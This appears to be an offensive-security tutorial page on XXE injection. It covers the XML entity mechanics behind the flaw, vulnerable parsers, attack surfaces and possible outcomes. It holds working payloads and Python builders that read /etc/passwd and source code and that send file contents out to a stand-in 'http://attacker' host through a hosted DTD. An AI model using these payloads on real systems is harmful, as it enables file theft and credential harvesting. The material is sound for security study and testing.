XXE

When a web app processes XML from user input and the parser has external-entity resolution enabled, the operator can declare entities that point at server-side resources - local files, internal URLs, or even (with PHP’s expect://) shell commands. The vulnerability is mostly a function of using an outdated or poorly configured XML library.

# 1. Find an XML input surface (SOAP, REST-with-XML, form data with Content-Type: application/xml,
# SVG upload, DOCX/XLSX upload, anywhere "Content-Type: text/xml" or "application/xml" appears)
# 2. Prove entity resolution works
<!DOCTYPE foo [<!ENTITY test "PROOF">]>
<root><field>&test;</field></root>
# → if the response reflects "PROOF" where the entity was, you're in
# 3. Read local file
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><field>&xxe;</field></root>
# 4. Read source code via PHP filter wrapper
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><field>&xxe;</field></root>
# 5. Blind exfil via out-of-band DTD
<!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker/x.dtd">%remote;%oob;]>

Success indicator: a file’s contents (or their base64 encoding) appear in the application’s response, or the attacker’s listener receives an HTTP/DNS callback containing the file’s contents.
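Steps 2 and 3 of the workflow can be sketched as small payload builders plus a reflection check. This is a minimal illustration, not a finished tool: the function names, the default `root`/`field` element names, and the random marker format are all assumptions, and a real target will need its own element names.

```python
import uuid


def build_reflection_probe(root: str = "root", field: str = "field") -> tuple[str, str]:
    """Return (marker, payload) for the internal-entity reflection probe (step 2)."""
    # A random marker avoids false positives from static page content.
    marker = "xxe-" + uuid.uuid4().hex[:12]
    payload = (
        f'<!DOCTYPE foo [<!ENTITY test "{marker}">]>\n'
        f"<{root}><{field}>&test;</{field}></{root}>"
    )
    return marker, payload


def build_file_read(path: str, root: str = "root", field: str = "field") -> str:
    """Return the external-entity payload for a local file read (step 3)."""
    return (
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        f"<{root}><{field}>&xxe;</{field}></{root}>"
    )


def entity_was_resolved(response_body: str, marker: str) -> bool:
    """True if the marker came back without the raw declaration being echoed.

    If the application simply mirrors the request body, the marker appears
    together with the "!ENTITY" declaration; that is not proof of resolution.
    """
    return marker in response_body and "!ENTITY" not in response_body
```

Sending the payload is left out on purpose; any HTTP client works, as long as the request carries the XML Content-Type the endpoint expects.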

XML is a structured text format using tags to nest elements:

<?xml version="1.0" encoding="UTF-8"?>
<email>
<sender>[email protected]</sender>
<recipients>
</recipients>
<body>Hello, kindly share the invoice...</body>
</email>

Key concepts:

| Concept | Example | Notes |
| --- | --- | --- |
| Declaration | <?xml version="1.0" encoding="UTF-8"?> | First line; defines XML version and encoding |
| Element | <sender>...</sender> | Tag pair around content |
| Attribute | <email type="invoice"> | Key-value pairs on tags |
| Entity | &amp;, &lt;, &company; | Named placeholder; resolved at parse time |
| DTD (Document Type Definition) | <!DOCTYPE foo [ ... ]> | Schema and entity declarations |

The entity machinery is what makes XXE possible. An entity is a variable in XML - declared in the DTD, referenced in the document body with &name;. The XML parser performs the substitution at parse time.

An internal entity is declared and used in the same document:

<!DOCTYPE foo [
<!ENTITY greeting "Hello world">
]>
<message>&greeting;</message>

The parser resolves &greeting; to Hello world before the application sees the parsed XML. This has no security implication on its own.
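The substitution is easy to observe with any parser that expands internal entities. The sketch below uses Python's standard-library ElementTree as a stand-in for whatever parser the target application actually runs.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<!DOCTYPE foo [
<!ENTITY greeting "Hello world">
]>
<message>&greeting;</message>"""

# The application code only ever sees the already-substituted text.
message = ET.fromstring(DOCUMENT)
print(message.text)  # Hello world
```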

Entities can point at external resources:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>

When the parser resolves &xxe;, it reads /etc/passwd from disk and substitutes the file contents. The application then renders <message> containing the full passwd file. Vulnerability primitive: arbitrary file read.

Parameter entities are a second class of entities, declared with %, that can only be referenced inside the DTD:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker/?%file;'>">
%wrapper;
]>
<message>&exfil;</message>

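Parameter entities can be combined with other declarations in ways general entities cannot: here %file; is spliced into the URL of a newly declared entity. The XML 1.0 spec forbids parameter-entity references inside a declaration in the internal subset, so in practice the %file; and %wrapper; declarations are served from an attacker-hosted external DTD. This is the mechanism for out-of-band exfiltration when the application doesn’t echo entity content back - see Blind exfil.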
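A minimal sketch of how the two halves of an out-of-band payload fit together, assuming the parameter-entity declarations are hosted on an attacker-controlled server (as with x.dtd in step 5 of the workflow). The function name is hypothetical, and the x.dtd path and the `http://attacker` base URL are placeholders taken from the examples above.

```python
def build_oob_payloads(target_file: str, attacker_base: str) -> tuple[str, str]:
    """Return (hosted_dtd, request_body) for parameter-entity exfiltration."""
    # Served by the attacker as <attacker_base>/x.dtd. %file; is expanded
    # while %wrapper; is being defined, so the file contents end up inside
    # the URL of the exfil entity.
    hosted_dtd = (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f"<!ENTITY % wrapper \"<!ENTITY exfil SYSTEM '{attacker_base}/?%file;'>\">\n"
        "%wrapper;\n"
    )
    # Sent to the target. It only pulls in the remote DTD and then
    # references the entity that the DTD declared.
    request_body = (
        f'<!DOCTYPE foo [<!ENTITY % remote SYSTEM "{attacker_base}/x.dtd">%remote;]>\n'
        "<message>&exfil;</message>"
    )
    return hosted_dtd, request_body


hosted_dtd, request_body = build_oob_payloads("/etc/hostname", "http://attacker")
print(hosted_dtd)
print(request_body)
```

Single-line files such as /etc/hostname are the easiest first target here, since newlines and other special characters in the file contents tend to break the resulting URL.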

XML parsers historically resolved external entities by default. The XML 1.0 spec doesn’t forbid it; security-conscious settings are opt-in. So apps using older or unhardened XML stacks (libxml2 before 2.9, Java’s JAXP parsers without the hardening features set, .NET Framework XmlDocument or XmlTextReader before 4.5.2 without XmlResolver = null) inherit the unsafe default.

Many modern parsers disable external entities by default. But:

  • Many legacy apps still run on outdated XML stacks
  • Some apps re-enable external entities for legitimate reasons (XML schema validation against external schemas) without realizing the implications
  • Document-processing chains (SVG → image, DOCX → text extraction) may invoke XML parsing transitively in components the developer doesn’t think of as “XML parsers”
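To make the "safe default" side concrete, the sketch below shows two things with Python's standard library: ElementTree refusing to resolve an external entity, and a stricter wrapper that rejects any DOCTYPE before parsing. `parse_untrusted` and `DoctypeRejected` are hypothetical names for illustration; this is one possible hardening pattern, not a description of how any particular application does it.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    # First pass: a bare expat parser whose only job is to abort on a DOCTYPE.
    checker = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed")

    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(data, True)
    # Second pass: the document has no DTD, so no entities can be declared.
    return ET.fromstring(data)


XXE = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<message>&xxe;</message>"
)

# ElementTree does not fetch the external entity; it raises instead.
try:
    ET.fromstring(XXE)
except ET.ParseError as exc:
    print("ElementTree alone:", exc)

# The wrapper stops earlier, at the DOCTYPE itself.
try:
    parse_untrusted(XXE)
except DoctypeRejected as exc:
    print("parse_untrusted:", exc)
```

Rejecting the DOCTYPE outright also blocks internal-entity expansion attacks, at the cost of refusing legitimate documents that ship a DTD.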

The result: XXE remains common enough that OWASP gave it a dedicated A4:2017 ranking and then folded it into A05:2021 (Security Misconfiguration) in the 2021 list.

| Surface | Indicator |
| --- | --- |
| SOAP API | Content-Type: text/xml; charset=utf-8, SOAPAction: header |
| REST with XML body | Content-Type: application/xml (sometimes accepted alongside JSON via content negotiation) |
| RSS/Atom feed ingestion | “Subscribe to feed”, URL-input fields that fetch XML |
| SVG upload | SVG is XML; image-processors may parse it as XML |
| DOCX / XLSX / ODT upload | Office documents are ZIP archives of XML; some servers parse the embedded XML |
| Web form with XML body | Some apps switched from forms to XML internally but kept the form UI |
| WS-Trust / SAML / WS-Federation | All XML-based protocols |
| JNLP, BPMN, OWL, KML, GPX | Niche XML formats; each is a potential XXE surface |
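For the Office-document row, a short sketch shows why these uploads count as XML surfaces: the archive is opened as a ZIP and its XML parts are listed. The helper name is hypothetical, and the in-memory archive is a stand-in built for the demo rather than a valid DOCX file.

```python
import io
import zipfile


def list_xml_parts(archive_bytes: bytes) -> list[str]:
    """Return the names of XML parts inside a ZIP-based document."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return sorted(
            name for name in archive.namelist() if name.endswith((".xml", ".rels"))
        )


# Build a tiny stand-in archive using part names typical of a DOCX file.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as demo:
    demo.writestr("[Content_Types].xml", "<Types/>")
    demo.writestr("word/document.xml", "<document/>")
    demo.writestr("word/media/image1.png", b"\x89PNG")

parts = list_xml_parts(buffer.getvalue())
print(parts)  # ['[Content_Types].xml', 'word/document.xml']
```

Each listed part is a place where a server-side extractor may run an XML parser, so each is a candidate location for a DOCTYPE when testing an upload feature.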

The “JSON API accepts XML on Content-Type swap” case is worth emphasizing. Some servers choose a body parser based on the Content-Type header, so sending the same data converted to XML, with Content-Type: application/xml instead of application/json, can expose unanticipated XML parsing paths.
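The Content-Type pivot can be sketched as a small converter from a flat JSON body to an equivalent XML body. The function name and the default `root` element are assumptions; the element names a given server expects have to be discovered per target, and nested JSON would need a recursive version.

```python
import json
import xml.etree.ElementTree as ET


def json_body_to_xml(json_text: str, root_tag: str = "root") -> tuple[dict[str, str], str]:
    """Convert a flat JSON object into (headers, xml_body) for the pivot."""
    fields = json.loads(json_text)
    root = ET.Element(root_tag)
    for key, value in fields.items():
        # Each JSON key becomes a child element holding the value as text.
        child = ET.SubElement(root, key)
        child.text = str(value)
    headers = {"Content-Type": "application/xml"}
    return headers, ET.tostring(root, encoding="unicode")


headers, body = json_body_to_xml('{"name": "alice", "id": 7}')
print(headers)
print(body)  # <root><name>alice</name><id>7</id></root>
```

If the server answers the XML version the same way it answers the JSON one, the next step is the reflection probe with a DOCTYPE prepended to the converted body.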

What XXE produces depends on the parser and the application:

| Outcome | Requirement | Where covered |
| --- | --- | --- |
| File read (response-reflected) | Entity content is echoed in response | File disclosure |
| File read (blind) | No reflection, but parser supports parameter entities and external HTTP | Blind exfil |
| Source-code read | PHP target (via php://filter) or Java directory listing | File disclosure |
| SSRF | Parser supports HTTP schemes (http://, https://) | RCE and SSRF |
| RCE | PHP expect:// wrapper enabled (uncommon in modern installs) | RCE and SSRF |
| DoS via entity expansion | Modern parsers prevent; older ones don’t | RCE and SSRF |
| Windows hash theft | Windows host parsing UNC paths via \\attacker\share\file | Brief in RCE and SSRF |

The most common deliverable is file read - extracting /etc/passwd, configuration files with DB credentials, source code, SSH keys. From there, the engagement often pivots to lateral movement using harvested credentials.

| Page | Focus |
| --- | --- |
| Identifying | Finding XML surfaces, the JSON-to-XML Content-Type pivot, the <!ENTITY test "value"> reflection probe |
| File disclosure | Basic file://, source-code via php://filter/convert.base64-encode, Java directory listing, high-value file targets |
| Blind exfil | CDATA wrap via external parameter entities, error-based exfil, full out-of-band HTTP exfil with hosted DTD |
| RCE and SSRF | PHP expect:// to webshell drop, internal port scanning, billion-laughs DoS, Windows UNC hash theft |
| Automation | XXEinjector tool walkthrough, request-file format, automated CDATA/error/OOB modes |
| Skill assessment chain | Capstone walkthrough - IDOR + verb tampering + XXE combining to read /flag.php |

| Topic | Page |
| --- | --- |
| Reaching XXE via XSLT injection | XSLT injection |
| Reaching XXE via SVG upload | Limited uploads |
| SSRF as a primary class (XXE-SSRF is one delivery mechanism) | SSRF cluster |
| File-read patterns analogous to XXE | LFI cluster |
| Chained SOAP → XXE attacks | SSRF chained |
| Verb tampering inside XML endpoints | Verb tampering |
| IDOR-protected XML endpoints (admin-only event creation, etc.) | IDOR cluster |